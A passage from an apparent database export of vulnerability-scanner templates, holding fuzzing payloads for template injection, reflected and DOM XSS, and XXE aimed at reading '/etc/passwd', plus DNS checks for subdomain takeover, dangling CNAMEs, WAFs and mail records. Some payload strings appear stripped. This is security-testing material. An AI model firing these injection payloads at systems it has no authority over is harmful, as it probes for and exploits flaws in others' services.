4a0a00473045022100f1036d0d83d2d319f244f143873a16f2ae222e1f0d7dfa3a12604bc50547945c022014f428e033f9ac02ba873325301b910fde7ae7fac3613ab0388ea5d9a14e5f56:922c64590222798bb761d5b6d8e72950", "hash": "f35a663490050a1e57bc67c8207c0896", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf307c8d" }, "name": "reflection-ssti.yaml", "content": "id: reflection-ssti\n\ninfo:\n name: Reflected SSTI Arithmetic Based\n author: pdteam\n severity: medium\n reference:\n - https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java\n - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update\n tags: ssti,dast\n\nvariables:\n first: \"{{rand_int(1000, 9999)}}\"\n second: \"{{rand_int(1000, 9999)}}\"\n result: \"{{to_number(first)*to_number(second)}}\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n skip-variables-check: true\n payloads:\n ssti:\n - '{{concat(\"${\", \"{{first}}*{{second}}\", \"}\")}}'\n - '{{concat(\"{{\", \"{{first}}*{{second}}\", \"}}\")}}'\n - '{{concat(\"<%=\", \"{{first}}*{{second}}\", \"%>\")}}'\n - '{{concat(\"{\", \"{{first}}*{{second}}\", \"}\")}}'\n - '{{concat(\"{{{\", \"{{first}}*{{second}}\", \"}}}\")}}'\n - '{{concat(\"${{\", \"{{first}}*{{second}}\", \"}}\")}}'\n - '{{concat(\"#{\", \"{{first}}*{{second}}\", \"}\")}}'\n - '{{concat(\"[[\", \"{{first}}*{{second}}\", \"]]\")}}'\n - '{{concat(\"{{=\", \"{{first}}*{{second}}\", \"}}\")}}'\n - '{{concat(\"[[${\", \"{{first}}*{{second}}\", \"}]]\")}}'\n - '{{concat(\"${xyz|\", \"{{first}}*{{second}}\", \"}\")}}'\n - '{{concat(\"#set($x=\", \"{{first}}*{{second}}\", \")${x}\")}}'\n - '{{concat(\"@(\", \"{{first}}*{{second}}\", \")\")}}'\n - '{{concat(\"{@\", \"{{first}}*{{second}}\", \"}\")}}'\n\n fuzzing:\n - part: query\n type: postfix\n fuzz:\n - \"{{ssti}}\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"{{result}}\"\n# digest: 4a0a00473045022060b24ab805932a9aae5635d76725d92d78d3366f76b103480386f7db2231b750022100cf4e3feff8153a59a9b668bbe6c989c4940074ec6857c5f4f4f920660719143d:922c64590222798bb761d5b6d8e72950", "hash": 
"8dd625e878105966a28582ec8a08758b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8e" }, "name": "dom-xss.yaml", "content": "id: dom-xss\n\ninfo:\n name: DOM Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Detects DOM-based Cross Site Scripting (XSS) vulnerabilities.\n impact: |\n Allows attackers to execute malicious scripts in the victim's browser.\n remediation: |\n Sanitize and validate user input to prevent script injection.\n tags: xss,dom,dast,headless\nvariables:\n num: \"{{rand_int(10000, 99999)}}\"\nheadless:\n - steps:\n - action: navigate\n args:\n url: \"{{BaseURL}}\"\n\n - action: waitload\n payloads:\n reflection:\n - \"'\\\">

{{num}}

\"\n\n fuzzing:\n - part: query\n type: postfix\n mode: single\n fuzz:\n - \"{{reflection}}\"\n\n stop-at-first-match: true\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

{{num}}

\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n# digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950", "hash": "de3b1d462cd569fabfb84e5bf8e959ad", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8f" }, "name": "reflected-xss.yaml", "content": "id: reflected-xss\n\ninfo:\n name: Reflected Cross Site Scripting\n author: pdteam\n severity: medium\n tags: xss,rxss,dast\n\nvariables:\n first: \"{{rand_int(10000, 99999)}}\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n reflection:\n - \"'\\\"><{{first}}\"\n\n fuzzing:\n - part: query\n type: postfix\n mode: single\n fuzz:\n - \"{{reflection}}\"\n\n stop-at-first-match: true\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"{{reflection}}\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950", "hash": "b884e62a19bff378ce7f66b0fe9c86ea", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c90" }, "name": "generic-xxe.yaml", "content": "id: generic-xxe\n\ninfo:\n name: Generic XML external entity (XXE)\n author: pwnhxl\n severity: medium\n reference:\n - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py\n tags: dast,xxe\n\nvariables:\n rletter: \"{{rand_base(6,'abc')}}\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n xxe:\n - ' ]>&{{rletter}};'\n - ' ]>&{{rletter}};'\n\n fuzzing:\n - part: query\n keys-regex:\n - \"(.*?)xml(.*?)\"\n fuzz:\n - \"{{xxe}}\"\n\n - part: query\n values:\n - \"(\"\n fuzz:\n - \"{{xxe}}\"\n\n stop-at-first-match: true\n 
matchers-condition: or\n matchers:\n - type: regex\n name: linux\n part: body\n regex:\n - 'root:.*?:[0-9]*:[0-9]*:'\n\n - type: word\n name: windows\n part: body\n words:\n - 'for 16-bit app support'\n# digest: 490a00463044022057ed734a899a6e84282567122e7cbd55d596db47869a9f1079fdda8222765cdd02206129d4a12c906388ae43c37e4048a1913371fc637748eaaefc1356dbae82d139:922c64590222798bb761d5b6d8e72950", "hash": "bcdf8045538fb0ef1069cb60ac5900d8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c91" }, "name": "azure-takeover-detection.yaml", "content": "id: azure-takeover-detection\n\ninfo:\n name: Microsoft Azure Takeover Detection\n author: pdteam\n severity: high\n description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a DNS record points to a deprovisioned Azure resource.\n reference:\n - https://godiego.co/posts/STO/\n - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover\n - https://cystack.net/research/subdomain-takeover-chapter-two-azure-services/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cwe-id: CWE-404\n metadata:\n max-request: 1\n tags: dns,takeover,azure\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"azure-api.net\"\n - \"azure-mobile.net\"\n - \"azurecontainer.io\"\n - \"azurecr.io\"\n - \"azuredatalakestore.net\"\n - \"azureedge.net\"\n - \"azurefd.net\"\n - \"azurehdinsight.net\"\n - \"azurewebsites.net\"\n - \"azurewebsites.windows.net\"\n - \"blob.core.windows.net\"\n - \"cloudapp.azure.com\"\n - \"cloudapp.net\"\n - \"database.windows.net\"\n - \"redis.cache.windows.net\"\n - \"search.windows.net\"\n - \"servicebus.windows.net\"\n - \"trafficmanager.net\"\n - \"visualstudio.com\"\n\n - type: word\n 
words:\n - \"NXDOMAIN\"\n\n extractors:\n - type: dsl\n dsl:\n - cname\n\n# digest: 4a0a00473045022043d1113417de308936591aa35f8175c25ad9d5b66b6d076fe0ba324450b1799e022100add5bb113b494d920eb39a99c107f2e7dff1979d482302e2580ff07e5857d9ff:922c64590222798bb761d5b6d8e72950\n", "hash": "06433763a77ee0d9d28304b3187a1209", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c92" }, "name": "caa-fingerprint.yaml", "content": "id: caa-fingerprint\n\ninfo:\n name: CAA Record\n author: pdteam\n severity: info\n description: A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\n reference:\n - https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,caa\n\ndns:\n - name: \"{{FQDN}}\"\n type: CAA\n matchers:\n - type: regex\n regex:\n - \"IN\\\\s+CAA\\\\s+(.+)\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - 'issue \"(.*)\"'\n - 'issuewild \"(.*)\"'\n - 'iodef \"(.*)\"'\n\n# digest: 4a0a00473045022023198a26073ed129fe588c545c89a003975219e7da0033744c267d99093324370221008a42dc42e882b45ff2f7ef81ffd916e41dab50a710deb2d0c7268bf9dec11e8f:922c64590222798bb761d5b6d8e72950\n", "hash": "2ebbf26635b0b2f4629b7e120f7ab7e8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c93" }, "name": "detect-dangling-cname.yaml", "content": "id: detect-dangling-cname\n\ninfo:\n name: CNAME Detect Dangling\n author: pdteam,nytr0gen\n severity: info\n description: A CNAME detect dangling condition was discovered. 
Most commonly this relates to failing to remove records from the zone once they are no longer needed.\n reference:\n - https://securitytrails.com/blog/subdomain-takeover-tips\n - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/\n - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f\n - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,takeover\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"NXDOMAIN\"\n\n - type: regex\n part: answer\n regex:\n - \"IN\\tCNAME\\t(.+)$\"\n\n extractors:\n - type: dsl\n dsl:\n - cname\n\n# digest: 4a0a0047304502201b035521c9d0b1afe37b2bb5326afde1f0022e730b8dd87fa3d247daa558c8a4022100fe8ffe8dec0946abcb2cea2241ed5836041f0fb092417c2eb3ff9b2625ad4dac:922c64590222798bb761d5b6d8e72950\n", "hash": "b1b2919bd4948a014ec4ae0002387247", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c94" }, "name": "dmarc-detect.yaml", "content": "id: dmarc-detect\n\ninfo:\n name: DNS DMARC - Detect\n author: juliosmelo\n severity: info\n description: |\n DNS DMARC information was detected.\n reference:\n - https://dmarc.org/\n - https://dmarc.org/wiki/FAQ#Why_is_DMARC_important.3F\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,dmarc\n\ndns:\n - name: \"_dmarc.{{FQDN}}\"\n type: TXT\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tTXT\\\\t(.+)$\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"IN\\tTXT\\t(.+)\"\n\n# digest: 4a0a0047304502204076c7a56a64102033ddcbffe604e0099b21d4e3fc93681f25db84b6c9ea0d49022100cc84a29967d71f3d07b107990f34ec5d804757336391661727adf79dc07eef3d:922c64590222798bb761d5b6d8e72950\n", "hash": "7eab67baf60eba1c5ca089f342062c6e", "level": 2, "time": "2024-05-17 
23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c95" }, "name": "dns-rebinding.yaml", "content": "id: dns-rebinding\ninfo:\n name: DNS Rebinding Attack\n author: ricardomaia\n severity: unknown\n description: |\n Detects DNS Rebinding attacks by checking if the DNS response contains a private IPv4 or IPv6 address.\n reference:\n - https://capec.mitre.org/data/definitions/275.html\n - https://payatu.com/blog/dns-rebinding/\n - https://heimdalsecurity.com/blog/dns-rebinding/\n metadata:\n max-request: 2\n tags: redirect,dns,network\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n matchers:\n # IPv4\n - type: regex\n part: answer\n regex:\n - 'IN\\s+A\\s+(127\\.0\\.0\\.1|10\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}|172\\.(1[6-9]|2\\d|3[0-1])\\.\\d{1,3}\\.\\d{1,3}|192\\.168\\.\\d{1,3}\\.\\d{1,3})$'\n\n extractors:\n - type: regex\n part: answer\n name: IPv4\n group: 1\n regex:\n - 'IN\\s+A\\s+(127\\.0\\.0\\.1|10\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}|172\\.(1[6-9]|2\\d|3[0-1])\\.\\d{1,3}\\.\\d{1,3}|192\\.168\\.\\d{1,3}\\.\\d{1,3})'\n\n - name: \"{{FQDN}}\"\n type: AAAA\n matchers:\n # IPv6 Compressed and Full\n - type: regex\n part: answer\n regex:\n - \"IN\\\\s+AAAA\\\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})\"\n\n extractors:\n - type: regex\n part: answer\n name: IPv6_ULA\n group: 1\n regex:\n - \"IN\\\\s+AAAA\\\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})\"\n# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950", "hash": "f99c962d1b19997f0b0e44d070697097", "level": 1, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c96" }, "name": "dns-saas-service-detection.yaml", "content": "id: dns-saas-service-detection\n\ninfo:\n name: DNS SaaS Service Detection\n author: noah @thesubtlety,pdteam\n severity: info\n description: A CNAME DNS record was discovered\n reference:\n - https://ns1.com/resources/cname\n - 
https://www.theregister.com/2021/02/24/dns_cname_tracking/\n - https://www.ionos.com/digitalguide/hosting/technical-matters/cname-record/\n metadata:\n max-request: 1\n tags: dns,service\n\ndns:\n - name: \"{{FQDN}}\"\n type: CNAME\n\n extractors:\n - type: dsl\n dsl:\n - cname\n\n matchers-condition: or\n matchers:\n - type: word\n part: answer\n name: ms-office\n words:\n - outlook.com\n - office.com\n\n - type: word\n part: answer\n name: azure\n words:\n - \"azure-api.net\"\n - \"azure.com\"\n - \"azure-mobile.net\"\n - \"azurecontainer.io\"\n - \"azurecr.io\"\n - \"azuredatalakestore.net\"\n - \"azureedge.net\"\n - \"azurefd.net\"\n - \"azurehdinsight.net\"\n - \"azurewebsites.net\"\n - \"azurewebsites.windows.net\"\n - \"blob.core.windows.net\"\n - \"cloudapp.azure.com\"\n - \"cloudapp.net\"\n - \"database.windows.net\"\n - \"redis.cache.windows.net\"\n - \"search.windows.net\"\n - \"servicebus.windows.net\"\n - \"visualstudio.com\"\n - \"-msedge.net\"\n - \"msappproxy.net\"\n - \"trafficmanager.net\"\n\n - type: word\n part: answer\n name: zendesk\n words:\n - \"zendesk.com\"\n\n - type: word\n part: answer\n name: announcekit\n words:\n - \"cname.announcekit.app\"\n\n - type: word\n part: answer\n name: wix\n words:\n - \"wixdns.net\"\n\n - type: word\n part: answer\n name: akamai-cdn\n words:\n - akadns.net\n - akagtm.org\n - akahost.net\n - akam.net\n - akamai.com\n - akamai.net\n - akamaiedge-staging.net\n - akamaiedge.net\n - akamaientrypoint.net\n - akamaihd.net\n - akamaistream.net\n - akamaitech.net\n - akamaitechnologies.com\n - akamaitechnologies.fr\n - akamaized.net\n - akaquill.net\n - akasecure.net\n - akasripcn.net\n - edgekey.net\n - edgesuite.net\n\n - type: word\n part: answer\n name: cloudflare-cdn\n words:\n - cloudflare.net\n - cloudflare-dm-cmpimg.com\n - cloudflare-ipfs.com\n - cloudflare-quic.com\n - cloudflare-terms-of-service-abuse.com\n - cloudflare.com\n - cloudflare.net\n - cloudflare.tv\n - cloudflareaccess.com\n - 
cloudflareclient.com\n - cloudflareinsights.com\n - cloudflareok.com\n - cloudflareportal.com\n - cloudflareresolve.com\n - cloudflaressl.com\n - cloudflarestatus.com\n - sn-cloudflare.com\n\n - type: word\n part: answer\n name: amazon-cloudfront\n words:\n - cloudfront.net\n\n - type: word\n part: answer\n name: salesforce\n words:\n - salesforce.com\n - siteforce.com\n - force.com\n\n - type: word\n part: answer\n name: amazon-aws\n words:\n - amazonaws.com\n - elasticbeanstalk.com\n - awsglobalaccelerator.com\n\n - type: word\n part: answer\n name: fastly-cdn\n words:\n - fastly.net\n\n - type: word\n part: answer\n name: netlify\n words:\n - netlify.app\n - netlify.com\n - netlifyglobalcdn.com\n\n - type: word\n part: answer\n name: vercel\n words:\n - vercel.app\n\n - type: word\n part: answer\n name: sendgrid\n words:\n - sendgrid.net\n - sendgrid.com\n\n - type: word\n part: answer\n name: qualtrics\n words:\n - qualtrics.com\n\n - type: word\n part: answer\n name: heroku\n words:\n - herokuapp.com\n - herokucdn.com\n - herokudns.com\n - herokussl.com\n - herokuspace.com\n\n - type: word\n part: answer\n name: gitlab\n words:\n - gitlab.com\n - gitlab.io\n\n - type: word\n part: answer\n name: perforce-akana\n words:\n - akana.com\n - apiportal.akana.com\n\n - type: word\n part: answer\n name: skilljar\n words:\n - skilljarapp.com\n\n - type: word\n part: answer\n name: datagrail\n words:\n - datagrail.io\n\n - type: word\n part: answer\n name: platform.sh\n words:\n - platform.sh\n\n - type: word\n part: answer\n name: folloze\n words:\n - folloze.com\n\n - type: word\n part: answer\n name: pendo-receptive\n words:\n - receptive.io\n - pendo.io\n\n - type: word\n part: answer\n name: discourse\n words:\n - bydiscourse.com\n - discourse-cdn.com\n - discourse.cloud\n - discourse.org\n - hosted-by-discourse.com\n\n - type: word\n part: answer\n name: adobe-marketo\n words:\n - marketo.com\n - marketo.co.uk\n - mktoweb.com\n - mktossl.com\n - mktoweb.com\n\n - 
type: word\n part: answer\n name: adobe-marketo - 'mkto-.{5,8}\\.com'\n\n - type: word\n part: answer\n name: adobe-marketo\n words:\n - marketo.com\n\n - type: word\n part: answer\n name: rock-content\n words:\n - postclickmarketing.com\n - rockcontent.com\n - rockstage.io\n\n - type: word\n part: answer\n name: rocketlane\n words:\n - rocketlane.com\n\n - type: word\n part: answer\n name: webflow\n words:\n - proxy-ssl.webflow.com\n\n - type: word\n part: answer\n name: stacker-hq\n words:\n - stacker.app\n\n - type: word\n part: answer\n name: hubspot\n words:\n - hs-analytics.net\n - hs-banner.com\n - hs-scripts.com\n - hsappstatic.net\n - hscollectedforms.net\n - hscoscdn00.net\n - hscoscdn10.net\n - hscoscdn20.net\n - hscoscdn30.net\n - hscoscdn40.net\n - hsforms.com\n - hsforms.net\n - hubapi.com\n - hubspot.com\n - hubspot.es\n - hubspot.net\n - hubspotemail.net\n - hubspotlinks.com\n - hubspotusercontent-na1.net\n - sidekickopen90.com\n - usemessages.com\n\n - type: word\n part: answer\n name: gitbook\n words:\n - gitbook.com\n - gitbook.io\n\n - type: word\n part: answer\n name: google-firebase\n words:\n - fcm.googleapis.com\n - firebase.com\n - firebase.google.com\n - firebase.googleapis.com\n - firebaseapp.com\n - firebaseappcheck.googleapis.com\n - firebasedynamiclinks-ipv4.googleapis.com\n - firebasedynamiclinks-ipv6.googleapis.com\n - firebasedynamiclinks.googleapis.com\n - firebaseinappmessaging.googleapis.com\n - firebaseinstallations.googleapis.com\n - firebaseio.com\n - firebaselogging-pa.googleapis.com\n - firebaselogging.googleapis.com\n - firebaseperusertopics-pa.googleapis.com\n - firebaseremoteconfig.googleapis.com\n\n - type: word\n part: answer\n name: zendesk\n words:\n - zdassets.com\n - zdorigin.com\n - \"zendesk.com\"\n - zopim.com\n\n - type: word\n part: answer\n name: imperva\n words:\n - incapdns.net\n - incapsula.com\n\n - type: word\n part: answer\n name: proofpoint\n words:\n - infoprtct.com\n - metanetworks.com\n - 
ppe-hosted.com\n - pphosted.com\n - proofpoint.com\n\n - type: word\n part: answer\n name: q4-investor-relations\n words:\n - q4inc.com\n - q4ir.com\n - q4web.com\n\n - type: word\n part: answer\n name: google-hosted\n words:\n - appspot.com\n - cloudfunctions.net\n - ghs.googlehosted.com\n - ghs4.googlehosted.com\n - ghs46.googlehosted.com\n - ghs6.googlehosted.com\n - googlehosted.com\n - googlehosted.l.googleusercontent.com\n - run.app\n\n - type: word\n part: answer\n name: wp-engine\n words:\n - wpengine.com\n\n - type: word\n part: answer\n name: github\n words:\n - github.com\n - github.io\n - githubusercontent.com\n\n - type: word\n part: answer\n name: ghost\n words:\n - ghost.io\n\n - type: word\n part: answer\n name: digital-ocean\n words:\n - ondigitalocean.app\n\n - type: word\n part: answer\n name: typedream\n words:\n - ontypedream.com\n\n - type: word\n part: answer\n name: oracle-eloqua-marketing\n words:\n - hs.eloqua.com\n\n - type: regex\n part: answer\n regex:\n - \"IN\\tCNAME\\\\t(.+)$\"\n - \"IN\\\\s*CNAME\\\\t(.+)$\"\n# digest: 490a0046304402205694ac1cba58232ec715831e94086da7081a9b756f86016358b1347a1a340787022040615d63a66787d706d2be8b3f13cead87f7278c471091a7783bfab4e4fa2aef:922c64590222798bb761d5b6d8e72950", "hash": "48b8a3876b80d7e72554ae1dffa3f29a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c97" }, "name": "dns-waf-detect.yaml", "content": "id: dns-waf-detect\n\ninfo:\n name: DNS WAF Detection\n author: lu4nx\n severity: info\n description: A DNS WAF was detected.\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 2\n tags: tech,waf,dns\n\ndns:\n - name: \"{{FQDN}}\"\n type: CNAME\n\n - name: \"{{FQDN}}\"\n type: NS\n matchers:\n - type: word\n part: answer\n name: sanfor-shield\n words:\n - \".sangfordns.com\"\n\n - type: word\n part: answer\n name: 360panyun\n words:\n - \".360panyun.com\"\n\n - type: word\n part: answer\n name: baiduyun\n words:\n - \".yunjiasu-cdn.net\"\n\n - 
type: word\n part: answer\n name: chuangyudun\n words:\n - \".365cyd.cn\"\n - \".cyudun.net\"\n\n - type: word\n part: answer\n name: knownsec\n words:\n - \".jiashule.com\"\n - \".jiasule.org\"\n\n - type: word\n part: answer\n name: huaweicloud\n words:\n - \".huaweicloudwaf.com\"\n\n - type: word\n part: answer\n name: xinliuyun\n words:\n - \".ngaagslb.cn\"\n\n - type: word\n part: answer\n name: chinacache\n words:\n - \".chinacache.net\"\n - \".ccgslb.net\"\n\n - type: word\n part: answer\n name: nscloudwaf\n words:\n - \".nscloudwaf.com\"\n\n - type: word\n part: answer\n name: wangsu\n words:\n - \".wsssec.com\"\n - \".lxdns.com\"\n - \".wscdns.com\"\n - \".cdn20.com\"\n - \".cdn30.com\"\n - \".ourplat.net\"\n - \".wsdvs.com\"\n - \".wsglb0.com\"\n - \".wswebcdn.com\"\n - \".wswebpic.com\"\n - \".wsssec.com\"\n - \".wscloudcdn.com\"\n - \".mwcloudcdn.com\"\n\n - type: word\n part: answer\n name: qianxin\n words:\n - \".360safedns.com\"\n - \".360cloudwaf.com\"\n\n - type: word\n part: answer\n name: baiduyunjiasu\n words:\n - \".yunjiasu-cdn.net\"\n\n - type: word\n part: answer\n name: anquanbao\n words:\n - \".anquanbao.net\"\n\n - type: regex\n name: aliyun\n regex:\n - '\\.w\\.kunlun\\w{2,3}\\.com'\n\n - type: regex\n name: aliyun-waf\n regex:\n - '\\.aliyunddos\\d+\\.com'\n - '\\.aliyunwaf\\.com'\n - '\\.aligaofang\\.com'\n - '\\.aliyundunwaf\\.com'\n\n - type: word\n part: answer\n name: xuanwudun\n words:\n - \".saaswaf.com\"\n - \".dbappwaf.cn\"\n\n - type: word\n part: answer\n name: yundun\n words:\n - \".hwwsdns.cn\"\n - \".yunduncname.com\"\n\n - type: word\n part: answer\n name: knownsec-ns\n words:\n - \".jiasule.net\"\n\n - type: word\n part: answer\n name: chuangyudun\n words:\n - \".365cyd.net\"\n\n - type: word\n part: answer\n name: qianxin\n words:\n - \".360wzb.com\"\n\n - type: word\n part: answer\n name: anquanbao\n words:\n - \".anquanbao.com\"\n\n - type: word\n part: answer\n name: wangsu\n words:\n - \".chinanetcenter.com\"\n\n - 
type: word\n part: answer\n name: baiduyunjiasue\n words:\n - \".ns.yunjiasu.com\"\n\n - type: word\n part: answer\n name: chinacache\n words:\n - \".chinacache.com\"\n\n - type: word\n part: answer\n name: cloudflare\n words:\n - \"ns.cloudflare.com\"\n\n - type: word\n part: answer\n name: edns\n words:\n - \".iidns.com\"\n\n# digest: 4a0a0047304502200a845666375d02a84b9b0a1b56465d375357774b8c0c3a044dccf1e02fbf6267022100bf5e4f34f8e41d1cf13880ed6760c273df09e408a6d0c53c335dceeadac76182:922c64590222798bb761d5b6d8e72950\n", "hash": "90390f20617a8a33b413c75bc8c03b82", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c98" }, "name": "dnssec-detection.yaml", "content": "id: dnssec-detection\n\ninfo:\n name: DNSSEC Detection\n author: pdteam\n severity: info\n description: Domain Name System Security Extensions (DNSSEC) are enabled. The Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled.\n reference:\n - https://www.icann.org/resources/pages/dnssec-what-is-it-why-important-2019-03-05-en\n - https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,dnssec\n\ndns:\n - name: \"{{FQDN}}\"\n type: DS\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tDS\\\\t(.+)$\"\n\n# digest: 4b0a00483046022100dd7c45e1b16ab7caba75d6b28a27e3678896daad8cc2413e3f9120efa8be540202210095b8145af0ff47b2c140dc6f9f643f058bb31768759be99af4098f2cbd0d1997:922c64590222798bb761d5b6d8e72950\n", "hash": "fb21ecfdcc25da00665a2b134e1e9ce6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c99" }, "name": "ec2-detection.yaml", "content": "id: ec2-detection\n\ninfo:\n name: AWS EC2 Detection\n author: melbadry9\n severity: info\n description: Amazon Elastic Compute Cloud (EC2) detected.\n reference:\n - https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state\n 
classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,ec2,aws\n\ndns:\n - name: \"{{FQDN}}\"\n type: CNAME\n\n extractors:\n - type: regex\n regex:\n - \"ec2-[-\\\\d]+\\\\.compute[-\\\\d]*\\\\.amazonaws\\\\.com\"\n - \"ec2-[-\\\\d]+\\\\.[\\\\w\\\\d\\\\-]+\\\\.compute[-\\\\d]*\\\\.amazonaws\\\\.com\"\n\n# digest: 4a0a00473045022100995379438eef7d1b9435317e2326c27b32ff7c257437185c9bf505dc30d972e002202882175b25ec22258156a75b31ed020bfcdc29ababcd9e052ce591ab2acb3ff8:922c64590222798bb761d5b6d8e72950\n", "hash": "5cccc5c5cffdd05dab983a1c5cc3838e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9a" }, "name": "elasticbeanstalk-takeover.yaml", "content": "id: elasticbeanstalk-takeover\n\ninfo:\n name: ElasticBeanstalk Subdomain Takeover Detection\n author: philippedelteil,rotemreiss,zy9ard3,joaonevess\n severity: high\n description: ElasticBeanstalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. 
Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it.\n reference:\n - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147\n - https://twitter.com/payloadartist/status/1362035009863880711\n - https://www.youtube.com/watch?v=srKIqhj_ki8\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cwe-id: CWE-404\n metadata:\n max-request: 1\n comments: |\n Only CNAMEs with region specification are hijackable.\n You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover.\n Do not report this without claiming the CNAME.\n CLI command to verify the availability of the environment:\n aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX}\n For example:\n CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com\n Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c\n tags: dns,takeover,aws,elasticbeanstalk\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - CNAME\\t[a-z0-9_-]*\\.(us|af|ap|ca|eu|me|sa|il)\\-(north|east|west|south|northeast|southeast|central)\\-[1-9]+\\.elasticbeanstalk\\.com\n\n - type: word\n words:\n - NXDOMAIN\n\n extractors:\n - type: dsl\n dsl:\n - cname\n# digest: 4a0a00473045022050760ee5a49ba66950d709ad082c96f1f8cf59151573984107709cf7d108288b022100dddbce009750e8fb8c2018ff0937efe3be734a09791f0eb5715ea73b2593b0e2:922c64590222798bb761d5b6d8e72950", "hash": "55e337d1b529f49a2a12c064cb9b93a5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9b" }, "name": "mx-fingerprint.yaml", "content": "id: mx-fingerprint\n\ninfo:\n name: MX Record Detection\n author: pdteam\n severity: info\n description: An MX record was detected. 
